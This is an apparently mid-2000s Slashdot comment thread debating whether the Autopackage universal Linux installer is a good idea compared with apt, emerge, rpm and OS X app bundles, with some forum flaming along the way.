> if you make it easy for unknowledgable users to
> install software, they will destroy their Linux
> machines just as they destroy their Windows
> machines on a fairly regular basis. If you
> actually know what you're doing you don't _need_
> Autopackage... compiling from source is a fairly
> trivial task for a moderately experienced user.

With other words: security through obscurity?

Bullshit!

Re:I don't know about this

[theantix]

Others already addressed your other questions, so I'll do the latter one.

"This may sound elitist of me, but if you can't figure out how to do it now, you probably aren't capable of making that sort of decision."

Yes, you sound incredibly elitist, as if it is impossible to be smart and NOT a computer expert. There is a big difference between knowing enough about one's Linux distro to install a program and having enough common sense to find programs on the internet with minimal risk of installing malware. If I google search for software that simulates microwave spectra of asymmetric top molecules (and by the way there are quite a few) what are the odds I'm going to find spyware masking itself as what I'm looking for?

I am not suggesting that all people that can install software on linux are smart, or that all smart people should be able to install software. I am suggesting instead that the people who best understand the consequences of installing software are those people who can already manage to install this software. I know a lot of very intelligent people who installed a hell of a lot of "freeware" that came bundled with all sorts of amazing shit that requires them to format their hard drive and start anew from stratch.

Despite how smart and successful these people are, they do not understand how software works and repeatedly fail to act with good computing pracices. No joke, even after I moved them to linux they are still trying to download these shitty application EXEs and wondering why they can't run them. This difficulty really did save them from hurting themselves, if there was an autopackage already integrated into their distro they would have all the same sorts of annoying problems that they had on Windows. All of this does not make them any less intelligent, they are just not smart computer users because they have chosen to undertake the effort to fully understand it, just as I am intelligent despite not having an advanced knowledge of financial law.

Re:nextgen already here: emerge

I tried checkinstall back with Red Hat 7.1 when I was desperately trying to make RPM distributions sane to administer. I gave up eventually.

Let us know when you're ready to join us in 2005.

Mirror of the autopackage website

[FooBarWidget]

Mike setup a mirror of the autopackage website! It's here. The FAQ is also available on that mirror.

Re:Mirror of screenshots link

yeah, thanks for nothing asshole.

MIRROR IS HERE

[IamTheRealMike]

http://bylands.dur.ac.uk/~mh/autopackage.org/index .html

Re:MIRROR IS HERE

[sirReal.83.]

That's not a complete mirror :(

This is missing.

Re:Linux

No kidding... Windows has had this as long as I can remember (since 3.1)...

That said, one of the major barriers to Linux on the desktop finally fell. Rather than having to understand packages, people can simply download a file and have everything automagically set up.

Fix that, and either get GNOME and KDE to work together nicely, or standardise around one, and Linux on the desktop will become truely viable...

Re:nextgen already here: emerge

PKGDIR="/mnt/cdrom" emerge -vgk gnome

Next complaint, please.

Re:Linux

Yeah, I'll say the same thing about Microsoft Windows when it can actually use all of my system memory and not resort to some BIOS memory hole hack and preemptively multitask. I nearly laughed out loud when my officemate told me that it's normal to only have 3 GB of 4 available under Windows. Please.

Windows user gripes about linux: hard to use.
Unix gripes about Windows: performs poorly.

Re:nextgen already here: emerge

[ZephyrXero]

I'm a gentoo user as well, but I'm very excited by Autopackage. The whole reason many people use gentoo is b/c it is so easy to install software. The main problem with that system is that someone has to add it to the portage tree, and if it's not popular enough, it won't get in... with Autopackage you put the installation in the developers hands and you no longer have to rely on your distro to do it for you. I say use Portage/Apt/Whatever for your system/low-level programs and use autopackage for your higher level ones (Firefox, Gaim, GIMP, etc)...Autopackage could finally be the answer many Windows users have been waiting on to make the switch!

It would be nice...

[haeger]

...if one could just make one package and have it install on any distribution. It seems that the page is slashdotted at the moment so I can't see anything but the frontpage. :-/

.haeger

Re:It would be nice...

[isaks]

This is exactly what you get when using autopackage. Modulo some not-yet-discovered bugs of course :-)

Re:It would be nice...

[DeepHurtn!]

It also claims to be able to keep track of dependencies regardless of how you installed the package: source, rpm, etc. That is also very nice. I hope this works well and catches on with projects -- I imagine it would make both developer's and user's lives easier.

Re:nextgen already here: emerge

[bman08]

Portage doesn't work as well on Redhat or Debian systems as it does on Gentoo. The beautiful magic of Autopackage, as I understand it, is that one package works for all distributions. The theory is that devlopers will then only have to release one autopackage instead of making ebuilds, debs, rpms and whatever other packages the seventeen thousand faces of Linux are asking for these days.

Choice is Important!

[zerojoker]

I always thought that having the choice is one of the big advantages of open-source: Competition creates better software! Now they want to create one package-format for all distris? Time to make a fork! ;-) Seriously, i hope that developers start to pick it up asap...

Re:Choice is Important!

[hass]

Choices are nice, but as vectorian798 says below, we need some standards. The advantage Windows has over Linux is that when you write a program for Windows it will install on all Windows computers (without compiling the program yourself). You could fork the project so you have a choice of which program you use but we should have a standard package format. From what the flash clip shows this program looks pretty slick.

Re:Choice is Important!

[Taladar]

...on all Windows computers running the correct version of Windows and the correct drivers for hardware involved (how often have you installed different versions of graphics drivers to get a game running) and sometimes using the correct drive as system drive (the windows installer doesn't leave a choice here, you have to use the drive letter it assigns to the partition you want to use as system partition).

mirrordot mirrors of article and images

[Nallep]

http://mirrordot.org/stories/16feae672a6b23e1a6bde ee65c18984b/index.html
http://mirrordot.org/stories/4b8dff883e128d08839c1 323793affab/index.html
http://mirrordot.org/stories/5f34bd546afaa065409b5 e4822a1ed01/index.html

Re:nextgen already here: emerge

[ZephyrXero]

I think with Autopackage giving developers the freedom to make one installation package for all distros, it's going to make Linux really take off this year. The huge number of incompatable distros scares off many companies and developers, so maybe this will be the answer we've been looking for...

Mirrordot of Flash

[vectorian798]

Flash Demo Screenshots

I have to say this is like a godsave for linux. Most layusers will want some easy installation like this instead of using something like Yum (even if it is a GUI front-end to yum like GYUM). This is one giant step towards a viable desktop linux - and I believe that it isn't a replacement for apt/yum/[INSERT YOUR FLAVOR HERE] but uses them under the hood.

Before everyone starts bashing it and says that apt or emerge or whatever they use is the way to go, seriously think about it - one click installation, from a FRIENDLY user-interface, and easy to manage system for installing and uninstalling programs. Now if this were part of the base install on many distributions and some sort of standard was established (seriously, we need standards) I can probably convince my scared-of-Linux-because-it-is-hardcore friends to actually try Linux out.

Re:Mirrordot of Flash

[water-and-sewer]

I think a lot of folks are missing a fundamental point. I happen to love apt-get to update system software, but I am ROOT. And I'll bet every other person reading these comments is root too.

Autopackage is a much needed way to allow users - yes, common mortal users - to add software to their $HOME directory without modifying the system. This is a fantastic step forward and apt-get is no worse off for it.

Better still, I can apt-get system software, but try new stuff out in my $HOME directory without worrying I'll goof anything up system wide. Yeah, I know that's rare with .DEB packages, but why not be sure about it?

Re:Mirrordot of Flash

[I_am_the_man]

I ran into an issue in one of my environments that is related to what you are talking about. I had power users (bunch of developers and a dba). The rules went like this: If you want to install your own machine and have the freedom that comes with that, you cannot ask me for support on the machine ( I have no desire to debate this policy and it is not the point of the post; please keep that in mind). If I installed it I fixed all your issues but you got no root access and some sudo access. This was pretty black and white and therefore did not work for everything. I used apt-rpm for updating the systems as well as for inhouse custom packages. On the workstations I managed for the power users I did not want them to feel like they could not make any choices and wanted them to be able to install apps if they felt they needed them. I also needed to make sure that the apps they installed were not going to be bad for the setup.

The solution? Well since we had an internal apt repository I setup the repository so that one channel could be accessed without authentication (for the power users), set their sources.list file so that it only referenced that one channel (they did not have root) and allowed them to run apt-get via sudo. Any application a developer or the dba wanted I tested briefly and threw into the open channel so that everybody had access to it. It did not take very long to have pretty much all the apps everybody needed to do their job in the channel so that they could install it. The good thing is that one persons smart app choice was available to everybody once it was in the repository.

Try to keep this technique between you and I ;)

One Autopackage...

[dotslashdot]

One format to rule them all, One format to find them One format to bring them all and in the package bind them...

Re:One Autopackage...

[kernel_dan]

It was the best of packages. It was the worst of packages.

Re:One Autopackage...

[petrus4]

If I currently had modpoints, I'd devote all five of them to modding this post Overrated, and thus blast this juvenile, unfunny attempt at humour back to AC-level oblivion where it belongs.

Re:One Autopackage...

there needs to be a '-1, never been laid' mod...

Re:One Autopackage...

[dotslashdot]

You don't, sucka! Too bad for you. Others have loved and enjoyed my posting, which unlike your elitist pompous cry-baby whining, actually makes people smile. If you can't handle that, go join a war because your life is a waste anyway.

Re:One Autopackage...

[petrus4]

>which unlike your elitist pompous cry-baby whining,
>actually makes people smile.

Elitist? Pompous, cry-baby whining I can accept...I *have* engaged in that at times...But how am I elitist?

Apt-get is not bad either.

[jack_canada]

Apt-get the download, installation and resolves your dependencies for you, I think it's the best package management system fro Linux so far. The graphical front end "Synaptic" is also really good, it's intuitive and easy to use. Emerge is not bad either but you wouldn't want to go through the long hours of compiling from source.

Also, Autopackage has an O.K interface. I'm saying this because by looking at the screenshots, it doesn't let you mark multiple items, search database or manipulate repositories what synaptic lets you do. Another thing is, I don't think an interface like that would be effective when managing about 2000+ packages that I have on my Linux system,.

Re:Apt-get is not bad either.

[jack_canada]

the first line should be "Apt-get HANDLES the download, installation and resolves your dependencies for you, I think it's the best package management system fro Linux so far." I got carried away when I was typing :)./

Re:Apt-get is not bad either.

[frankm_slashdot]

dont take this as flame war starting.. just wanted to clear up for you that emerge can choose to download binaries instead of compiling.

Re:nextgen already here: emerge

[St.+Arbirix]

That still doesn't discount emerge with Gentoo's portage. For Gentoo in specific, emerge will retrieve the files it needs (often in source) and then run the various commands it needs to to get the program correctly inserted into your distribution (often this requires compiling).

There's nothing stopping anyone from using portage to install an entire system based on binaries. Besides, if a developer is releasing a package that truly works on all Linuxes then they're packaging compiled binaries for every architecture, using some sort of interpretation, or compiling upon installation. Portage can already retrieve the correct binary for your architecture based solely upon the ebuild file. Unless the AutoPackaging system requires you to download compiles for all architectures at once, they're going to be doing what portage already does with less dependence upon user compilation.

Very nice

[ptarjan]

How many time have you wanted to uninstal a package and then done this: rpm -qa .... and a thousand things run by .. then you have to guess the name of it.. or: man rpm .... trying to look for the command to find out the package name that contains a specific file. Then... after finding the name, you try rpm -e "package name", and it yells at you for some crazy dependency, like gaim depending on http or something like that. No, I must say that I have wanted a nice package manager for all my extraneous packages. I prefer packages to source because they make uninstalling much easier but autopackage seems to fill some of the voids with regular rpm packages.

Re:Very nice

gaim does not depend on http

Re:Very nice

[Taladar]

That is why rpm package managers are considered obsolete by the designers of almost all other package managers out there. rpm's flaws are the reason for the existence of most of them.

Re:Linux

[Doc+Ruby]

Which platform had packages installable from the Net, with dependencies and versioning, by clicking a single GUI button, in 1990? Or typing "installer install package"? One of the reasons I prefer Debian to Windows is precisely because of the package method of SW distribution. The closest MS has come is its WindowsUpdate abominations.

Mod parent up!

>>The current Linux model of distros integrating and authenticating software from upstream authors helps ensure the security >>

Well said.

I can update and upgrade my whole Debian system without worrying about malware because I know the contributors have to be trusted in order to be given upload privileges.

Isn't this why sooooo many people use ALL Microsoft applications and hardware? What's the difference?

Re:nextgen already here: emerge

[ArbitraryConstant]

Jesus Gentoo fanbois can be annoying. For some reason, unlike the users of every other distro, some Gentoo users think everyone would be happier with the decision they've made for themselves.

Some people like Gentoo, but some people have serious issues with it. emerge is a decent package manager, but it's attached to a distro that conservative users aren't going to touch. The more conservative distros have package managers that their users are already perfectly happy with, so it's unlikely to be used anywhere else.

Re:nextgen already here: emerge

[St.+Arbirix]

Plenty of people publish their own ebuilds seperately from the portage tree. That's what portdir_overlay is for.

It's similar to how many Fedora users get mp3 support. They use an unofficial update site.

testing, unstable, experimental and apt-get.org

[free2]

But what do you do if the software you need are not included with you distro?
I usually don't have this problem with Debian (especially with the huge testing and unstable distros), and even the Debian experimental repository is signed.

But if I did, I woud look for some known Debian maintener unofficial packages in apt-get.org .

Conflicts with existing package managers

[jesterzog]

I'm presently running Debian. I've briefly played with making my own .deb files so I'd be able to install some of my own things without necessarily completely losing track of everywhere they were scattered. With all of the extra meta files that need editing, the source packages versus binary packages, and everything else, though, the whole process of designing a .deb package looked a bit too structured and complicated for me to bother learning about... at least within the time I was prepared to spend.

If AutoPackage has a straightforward way to generate a simple package, such as from a tar.gz file, I might find it very helpful. What I'm wondering about, though, is how bad does it get when two package managers conflict? eg. Apt and AutoPackage might end up trying to control the same file, get mixed up between what manager is providing a particular dependency (particularly if Apt tries to grab a package that AutoPackage has already installed), or whatever else.

It also sounds a bit of extra work having two sets of commands to manage packages on one system, so ideally (in my world), I guess AutoPackage would wrap around Apt or whatever other manager, and invoke it when appropriate. Does AutoPackage just fight for control when there are conflicts, or does it integrate with other package managers nicely?

The server seems to be very slashdotted right now, so I can't do much reading up on it. Does this sort of conflict thing turn out to be much of a problem?

Re:Conflicts with existing package managers

[FooBarWidget]

Autopackage is meant to be an add-on that coexists with your native package manager. It's not meant to replace anything. And the conflicts you're talking about will only occur if you try to install the same deb and autopackage on purpose.
For post-1.0, native package manager integration is on our todo list.

Re:Conflicts with existing package managers

[jbr439]

I run debian and I use alien and checkinstall to create my own debs. Both are trivial to use and hide the complexity of debian package building. The one negative is that the created deb does not have dependencies.

At any rate, if you can create a tgz, you can use alien to create a deb out of it.

Re:Conflicts with existing package managers

I think what you want is checkinstall. It can create Slackware, RPM or Debian packages.

Re:Conflicts with existing package managers

[jesterzog]

And the conflicts you're talking about will only occur if you try to install the same deb and autopackage on purpose.

Thanks for the response.

A possible example that comes to mind might be if I installed an autopackage package (eg. for something new when it first came out), and then used apt to install something else later that depended on the .deb version of that package, perhaps several months afterwards when it's in the .deb archive. If apt doesn't realise that the AutoPackage rendition is already installed, it'll presumably try to fetch and install the respective .deb as a dependency for installation automatically, and they'll conflict.

Granted that it's probably not something that would be very common, and I don't want it to sound as if I think it's a major issue. But I always feel somewhat at odds when I know there may be special cases to look out for. It sounds as if this is the sort of thing that might be tackled later on, so I'm looking forward to it.

Re:Conflicts with existing package managers

[dbcad7]

It also sounds a bit of extra work having two sets of commands to manage packages on one system

how about this .. apt-get, aptitude, synaptic, all accomplish the same end, using the same resources.. but different interface

I see nothing worng with an installer such as this, as long as it is intergrated to use and maintain these same resources... synaptic is awesome, but maybe too much for some people to find what they are looking for.

I can see where a stand alone installer that worked within the apt system could be useful if it was monitored somehow.(perhaps a debian revokable certificate ?)

It's a pickle as they say. You want it to be easy to install things... but then you don't want it to be easy to install malware, spyware etc., or to break your system

Re:Linux

[PepeGSay]

The issue is that it is the first real solution that makes it "click" installable with Average Joe knowledge about the system. The fact that it also uses more modern delivery methods is certainly in its favor. Otherwise I would have said. "((Handshake)) Welcome to 1990. And congrats on only doing it as well as 1990 level even though it is 2005."

Making something "Internet aware" is just not an earth shattering big deal, it really never was. It is more important to talk about what you do with that internet awareness. Otherwise e-toys would have made billions.

Re:nextgen already here: emerge

[ZephyrXero]

I think you have missed the point... it's not a binary vs. source thing here, it the fact that there are so many different flavors of linux that it is overwhelming for a developer to release a different package for each one (including ebuilds!). I use Gentoo, but I think Autopackage is a great thing for the ENTIRE Linux community instead of just a single distro like all prior solutions...

Re:nextgen already here: emerge

[St.+Arbirix]

And how many other times has it been implemented for Linux?

Re:Linux

Fuck you all with your butt-fucking trolls! Trolls are for fucking losers, you dumbfuck.

:)

Re:nextgen already here: emerge

[ZephyrXero]

That's fine for advanced users who can handle the command line but what about the remaining 97% of the world?

Re:Linux

[Doc+Ruby]

Again, which platform had in 1990 the useability you're taking for granted today?

still doesn't solve

[XO]

It's a huge improvement over the existing solutions, and it SHOULD serve as a replacement for apt, yum, etc.

However, it still does not appear to address the main problem:

The package should only know what type of thing a file is. The distribution should determine where every type of thing should go.

Re:still doesn't solve

[DeepHurtn!]

The package should only know what type of thing a file is. The distribution should determine where every type of thing should go.

No, this is why it shouldn't replace apt, yum, etc. -- it looks like the whole point of AutoPackage is to deal with packages from *outside* your distro. For example, a project would only have to release one package -- an AutoPackage -- instead of different ones for each distribution. If you install something from source, it can still keep track of dependencies. I think their point is that apt, urpmi, etc are good for keeping a distro together, but not so good for third party stuff.

Re:still doesn't solve

However, it still does not appear to address the main problem:
The package should only know what type of thing a file is. The distribution should determine where every type of thing should go.

Unfortunately, that is not something that an independent project can arrange. It would require cooperation from all the distros. Maybe one day they will actually start to comply with things like LSB, and maybe LSB will start to specify things adequately. But that is the future, and people who want to use software today want to install it today, not in five years' time. So autopackage is a kludge: it's not perfect, but unlike the perfect solutions, it exists today.

About time.

[FinchWorld]

I'm far from Linux savvy and struggles with alot of things to the point I went over to an rpm based distro, rpms seeming the most simple to install.

Even then however there was often the question (when not using Command line) where it has just installed it. And the adding it as a menu item manually.

Re:About time.

I don't get your point relating to RPMs being simpler to install than major alternatives. In Debian:

apt-get package-name

in Gentoo:

emerge package-name ... not particularly tricky either way! If you want to use a GUI then Synaptic is quite nice for Debian-based distros. And if you're that scared of a command line you're probably not using Gentoo anyway, I would imagine.

If you're talking about third-party packages that aren't provided upstream then I can maybe see your point, but even then you tend to get "RPM-for-my-distro-of-choice" from the developers. When I used Mandrake for a while many years ago I recall being annoyed that every RPM I found was a RedHat one that didn't work right on Mandrake, or for the wrong version of mandrake and would cause all kinds of problems... ... and for all the naysayers here: Autopackage is a good idea. It makes sense to use things like Apt and RPM for OS package management, but the problem arises with things like Java, Enemy Territory and anything else that is provided as a binary executable file today. Unlike Windows, those aren't a very good way of installing things in a manageable format on a Linux desktop box.

What are we going to do if a company like Macromedia or Steinberg suddenly says "We want to do Linux ports!" (OK, this is an in-your-dreams scenario, but let's enjoy it)? Do we tell them to:

a) Make a binary package that we can't figure out how to uninstall without a wrapper like a Gentoo ebuild.
b) "Dear Macromedia. Thank you for your interest. Please contribute packages in all native distro forms and maintain them for us. Thank you!".
c) "Dear Steinberg. Thank you for your interest. Please hand over your source code so us Gentoo users can spend eighteen hours compiling it, it's just not fast enough without my ludicrous crash-causing optimisations. Also, is your support free?".
d) Ask them to make an autopackage and we can all use it, just like they do on Windows.

I vote for the latter option...

MOD PARENT UP

[labratuk]

(^^ And I swore I'd never do backseat moderating like that)

This is exactly what I was going to post. It drives me mad when windows users think that having centralised package management done by the distros is a weakness of linux systems. In fact, if there's one thing I would give windows to make it remotely usable, it would be an apt-get type system/repository of software. With such a system, software that's not trusted would never get into any respecable maintainer's database. No more 'Hay I downloaded this super adware megascan 2006 - it says it's supposed to get rid of my adware and double the speed of my internet but it's just got worse now...'.

This idea of just wandering around the web until you find packages opens the door to as many malware problems as windows, and will be a support nightmare to distro vendors, who, to support a system properly ideally must be able to know exactly what software has been put on and how. This is one of the things that makes unix systems so solid.

I dread to think what distro support forums would start to look like if this caught on.

Please tell me I'm completely off base as to what autopackage stands for - but I have read the site several times in the past.

Re:MOD PARENT UP

However there's a few of the boy-racer types who come from the "my-car-is-better-because-it-needs-fixing-every-we ekend" school of thought who like Gentoo because they can cripple their system constantly by repeatedly recompiling Xorg with ever more ludicrous compiler flags.

That brought a tear to my eye. I feel your pain. You guys should speak up some more. If I knew there were actually some clueful non-asshats using Gentoo I might actually give it a try. Hell, I might even stop refering to it as "Gentoy".

Re:nextgen already here: emerge

[ZephyrXero]

That's fine, but why are we trying to piss off the entire BSD community by bringing portage to BSD now? Have you talked to any BSD guys lately? They hate Gentoo guys now :(

When it ties in with RPM, I'll take a look

[levell]

Until I can install an autopackage on my FC3 desktop and rpm (and therefore yum) can use it in dependency resolution and update it then I don't intend to use it.

This isn't meant to be a criticism, I realise that they plan to do this and it takes time, to do everything that everyone wants is a long process ;)

Re:When it ties in with RPM, I'll take a look

[tajmorton]

That's planned for >1.0 (Integration with Native Package Managers, e.g., rpm, yum, apt-get, etc).

BackPackage

[Doc+Ruby]

The package frontends are getting better. But we desperately need better backend apps. The interpackage dependencies are getting more complex, and broken dependency references abound. And we need a structure that represents a further distinction than just source/binary: we need -dev structure, so packages that depend on the headers and config tools of other packages can find them automatically, without having to figure out their (distro-dependent) development package name. For that matter, a single, universal "lib-config" tool that spits back the versions, headers and filesys locations of any library installed by the package client, would really improve productivity and reliability.

The really big leap in backends would be a distributed repository. Instead of just a network of (unsync'ed) mirrors of a single monolithic repository, we need a mirrored or otherwise distributed directory of repositories, each with an overlapping fraction of the current repositories. That will accommodate the bandwidth and storage requirements for installing specific versions of packages, across the exploding Internet userbase, especially as the mirror:client ratio gets worse. Alternate repositories should be the rule, not just the exception.

Re:BackPackage

[IamTheRealMike]

The really big leap in backends would be a distributed repository.

I suspect you are thinking of something like Conary. However ... that said, a distributed and decentralised package management system is what autopackage is all about. Autopackages can resolve dependencies in a manner that does not require large monolithic databases: the packages themselves know where to go to find their dependencies if they're missing (and in future they'll be able to use yum, apt-get etc as well just in case).

Basically the apt-get type model doesn't work too well once you start having say >50 repositories all together, as co-ordinating the overlaps becomes too much of a nightmare. A much less tightly coupled system works better, which is what we have here.

Re:BackPackage

[Doc+Ruby]

I wish I could have seen the Flash demo before it got Slashdotted - another example of the need for scaleable, distributed repositories. Instead, I'm wrestling today with semi-installed GNOME2 packages, libraries, and headers. Programattically opening a URL with its registered transport and viewer apps shouldn't include manual searches of packages.debian.org in the critical path :/. What will it take to get the current repositories rerolled into autopackages?

Re:BackPackage

[IamTheRealMike]

You can see the Flash demo here.

You can't automatically convert pre-existing packages to autopackages. The process of building an autopackage is rather longer than an RPM because you have to improve the quality of the software at the same time to meet various standards. For instance a dependency audit may be useful, weakening various deps at runtime so you can run without them being present but use them if they are (relaytool) etc etc.

Too little, too late

Desktop Linux will be obsolete when Windows Longhorn hits the market.

Re:Too little, too late

[The+MESMERIC]

that should give us plenty of time to enjoy our Linux Desktops then.

Re:Too little, too late

What are you talkng about!! This is the YEAR OF LINUX and autoerotic enormouspackage is going to take us there!! Billy boy is running scared ummmmmmmmmmmmmm hhhmmmm

Re:Too little, too late

except for several things.
1. for those who have installed and actually used linux, it's easier than windows.
2. how much will longhorn cost?
3. how much does windows software cost? I can get a fully functional linux system for free. how much does visual c++ cost? yeah...
4. security, again

Re:Too little, too late

[Master+of+Transhuman]

By the time Longhorn hits the market, the human race will be extinct...

And it STILL won't have all the features Bill promised us ten years ago...

Re:nextgen already here: emerge

Ther's nothing inherently wrong with being a fanboy, especially when I can just type "emerge americas-army" or "emerge enemy-territory" and my gaming addiction is kept up to date :)

I will not use it

[houghi]

I am a SUSE user and yet have to find a program that does not have an rpm I can use. If the writer does not make an rpm, with running checkinstall, I doubt he will be using autopackage.

Using this would mean I need to have TWO things to use. One being Yast, the other being autopackage. Next somebody else does the same thing in a slightely different way and soon I will have a packager for every program I own.

Also its use is slightly more complicated then just doing rpm -Uvh (or for me yast -i, or rightclick on in Konquror)

As an extra, on the install site is says to chmod +x the files. Why not have the binaries already as chmod+x downloadable and if not, why do you need to do it on the commandline when 'sh file.package' works just as well.

Another disadvatage is the fact that houghi@penne it needs some extra code:

houghi@penne : sh inkscape-0.41-2.x86.package

The installation of this software requires some additional support
code to be installed.

Connecting to autopackage.org[130.225.247.90]:80... connected.
HTTP request sent, awaiting response...

Mmm. I can not install, because the site is down.

Did a search on rpm.bone.net on inkscape and copied the link and did 'rpm -Uvh ftp://link

Now what do you think I will use in the future?

Re:I will not use it

[rpozz]

I think the way autopackage would be used on something like SUSE would be that it would replace rpm packages. It would be integrated into yast, and you wouldn't notice the difference.

I don't think you or anyone would be expected to use it in its current state. I think it would be a good idea to let it become integrated into your distro first.

Parent is not 'Flamebait', dumbass moderators.

Re:I will not use it

[houghi]

If it will be integrated in Yast, that would be excelent. If that is going to happen, that is. apt is also available for SUSE and is yet not integrated in Yast, even though the sources are open.

So when Autopackage makes an integration into Yast, that will be nice. However then they must also do the same for other distro's and I thought that was just the point in NOT doing compilations for each distro.

I hope I am wrong. :-)

Re:I will not use it

[FooBarWidget]

"Why not have the binaries already as chmod+x downloadable"

Because it can't be done. File permissions are set by the browser and not a single browser sets +x for file downloads.

"Mmm. I can not install, because the site is down."

Well of course. We were Slashdotted. You can't really blame us for not having that much bandwidth can you?

Re:I will not use it

[Makarakalax]

You've pretty much proved that you haven't read any of the Autopackage FAQs. Congratulations on your obvious ignorance.

Re:nextgen already here: emerge

[evvk]

If autopackage is anything like autoconf, it won't help at all. It will work on just one distro and be broken on others.

I've said this many times, and in my opinion autoconf is totally wrong a solution to a problem. The proper solution would have been a package database database and library of wrappers or macros of common incompatibilities between flavours of *nix (syscalls, libc). As it stands, lots of redundant work is done by maintaining an -- often broken -- autoconf script for each package. I for one will never make autoconf a dependency -- only a discouraged option. It must always be possible to edit a Makefile.

Re:Linux

[ZephyrXero]

Another point you missed was that even with Windows, you still have to download a different installer for Win95, Win98, WinNT, Win2000/XP...but with Autopackage you can do every single flavor of linux in one fell swoop (as long as it's the same architecture).

Re:nextgen already here: emerge

[ZephyrXero]

I'm pretty sure autoconf and autopackage are completely unrelated, so for you to judge autopackage based on your experience with autoconf is completely off base.

Re:nextgen already here: emerge

[ArbitraryConstant]

Plenty of people do, plenty of people don't. Unless everyone does it, you can't assume it will be available for what you need.

Re:nextgen already here: emerge

I'm setting you as a "friend" because you're a Gentoo user and you're not a jackass.

Wow there is a lot of evangelizing here

Instead of saying how cool it is, or how cool emerge is, or how cool apt-get is, can someone actually do a post with subtance? Such as a comparison between AP and one of the other tools? Hey AP guys, make a package out of something standard like kmines or gnome-terminal and post it. That will let us see how it stacks up.

This thread reads like a sales article

Re:Wow there is a lot of evangelizing here

[IamTheRealMike]

There are already packages of Gaim, Inkscape, and AbiWord. Unfortunately if you want to test them you must download this file manually and then this one, and put it in the same directory as the .package - the redirects we use to stay independent of sunsite have been crushed out of existance by the Slashdot effect. It's a temporary problem, don't worry.

Asking how they stack up is a bit of a biased question. Autopackage isn't meant to compete directly with RPM/DPKG or replace them, it's meant as a complement. They are designed for different things. For instance, a package of gnome-terminal makes no sense because that's a core part of the OS and autopackage is meant for third party applications. Capabilities RPM needs like auto-shlib-dep discovery are done differently in autopackage and vice-versa.

Re:Wow there is a lot of evangelizing here

[polyp2000]

Funny , I just downloaded the package file for inkscape, set it to executable and launched the file from KDE. It really couldnt have been simpler (cept the changing the ".package" file to executable maybe a bit difficult for new users to grasp.) -you perhaps?

The package files contain everything you need to install the file. If it is the first time you use. an auto-packaged file you may find that you are asked to download a couple of support files "automatically" . I dont see why you needed to download those files in order to begin the install process. the only manual download you need to do is the package file itself. Unless of course you failed to read the bullet point guide and tried to install without setting the package as an executable. In which case there really is no hope for you.

Just in case you missed it and for the benefit of anyone else. Its a good idea to read this if you want to test them out.

4 step guide

I tested this on gentoo and im impressed so far. It just remains to be seen if this rises in popularity and how easily it breaks (im nursing gentoo out of a fix right now!). I beleive that this is a good thing and something that is needed by linux. The various packaging systems are great for specific distros. But are largely incompatible with each other. While this is great for open source projects and developers its also something i would like to see some of the proprietary providers utilise. It would be great if things like acrobat reader and flash-plugin and those other essentials were to use this system. All too many times I've found myself trying to install stuff that i couldnt build from source - or only came in an RPM or DEB. This could help change a lot of problems for new and seasoned linux users alike.

Lets face it - it doesnt matter what flavor linux you use how is joe sixpack supposed to know whether he wants an ebuild, deb or rpm. Let alone know what to do with a ".tar.gz"?

Re:Linux

since when? all the Windows applications I've run into only have one installer and they work fine on all Win32 based machines. Some web-sites provide two different versions, one for Win9x/ME and one for Win2000/XP, but the ones I've seen are doing it solely for optimization purposes.
of course there are certain programs that *only* work on an NT kernel and those don't even come for Win9x/ME, but that is not the issue here.

The idea of packages is bad.

[jxdxbx]

For distributing user applications, at least.

There is no earthly reason why a GUI application should scatter files hither and yon across a hard drive, and why installing a program should require some package or installer or whatever.
I cannot believe the hassle that I have to go through to install software on my Linux box as opposed to my Mac.

An OS X application consists of one file--- really a bundle. It is a directory that acts like a single executable file. Everything it needs to run that is not part of the basic OS X setup is in that file.

You don't even need to install the application. You can just run it from its compressed disk image that is still sitting in your downloads directory, if you like. Or you can copy it to your hard drive wherever you like. When you tire of it, you delete it.

Now, "Linux" is not capable of doing this because no one runs just Linux. But there is no reason why, say, Gnome apps can't be distributed this way. If there are technical issues in the way, they need to be resolved. Because the OS X way is better that the Linux and the Windows methods, and ought to be copied.

(ps: I do know that Unix programs are often installed via packages in OS X, as well as software that for whatever reason needs to modify the OS. But these are very rare and approached warily by seasoned OS X users.)

Re:The idea of packages is bad.

[pavera]

I agree with you that software installation should be much more like OS X. It is the cleanest way to install software. However, I think the largest obstacle to this sort of thing in Linux is that 99% of programs have dependencies, and the program needs a way to check whether software x, y, and z are installed prior to installing itself. This is the facility that package management systems like RPM, apt, emerge, etc provide.

The ability to see if something else is installed and decide what to do based on that is very important in the Linux world. With the OS X way there is no way that program q can tell if it's dependencies x, y, and z are met as you copy q's file over to your Applications directory.

Fink on OS X does it for unix/linux software on OS X (making sure that dependencies are met). Anyway, even Gnome apps have dependencies sometimes on ssl libs, netscape libs, and without a package manager of some sort, you end up with software that won't run.

Re:The idea of packages is bad.

[jxdxbx]

Most big components should be a part of any distribution, and those should be enough for 90% of applications.

Little stuff can just be part of the bundle. I don't mind it if a bundle is 5 megs larger than it would otherwise need to be if it makes my life easier.

Re:The idea of packages is bad.

[Nailer]

"There is no earthly reason why a GUI application should scatter files hither and yon across a hard drive"

Because your impotant binaries, less importanmt binaries, documentation, and config files should all be in the one place, rather than scattered hither and yon across a billion application specific directories?

- I can run any app by typing its name because every app has its binaries in the PATH dir
- I can back up by configuration by copying my /etc dir
- I can speed up my server by putting its busiest directory (/var, which stores my web site, FTP site, DNS zone files, LDAP directory, and anythign else I'm serving) on my fastest disk.
- I can have as many mount points as I want, but I only need one, small partition to recover my ststem, as all my important binaries and libraries are in /, and my less important stuff is kept sperately in /usr.

It's possible to create easy ways to browse, fetch and install software on Linux without losing the benfits that Unix style filesystems provide. Try Synaptic!

Re:The idea of packages is bad.

[eraserewind]

Those reasons are mostly just technical artifacts of the way it's done in linux/unix.

bin, man, lib, var, etc, could just as easily be "virtual directories" (equivalent to views in a database) that scanned your PATH for self contained app directories that obeyed some standard for laying themselves out.

Mounting could be implemented backwards (push instead of pull). Create your website in /data/website, and "reverse mount" it to both /dev/fastdisk and /dev/journaledbackupdisk.

Re:The idea of packages is bad.

[binford2k]

So . . you don't have a modem, do you?

Re:The idea of packages is bad.

[pavera]

well I don't want enough libraries to run 90% of software on my servers. I might on my desktop machines though... so I need a system that tells me what is installed and what is not. Having a monolithic system that automatically installs enough libs so that 90% of software runs gets you quickly into the MS security problems.

Re:The idea of packages is bad.

[Nailer]

Sure I like the idea of views too. But ultimately the files have to go somewhere, and things like a /var directory for the things you're serving and a /usr directory for non-essential binaries and libraries are useful, because you can put those directories on a specific storage device.

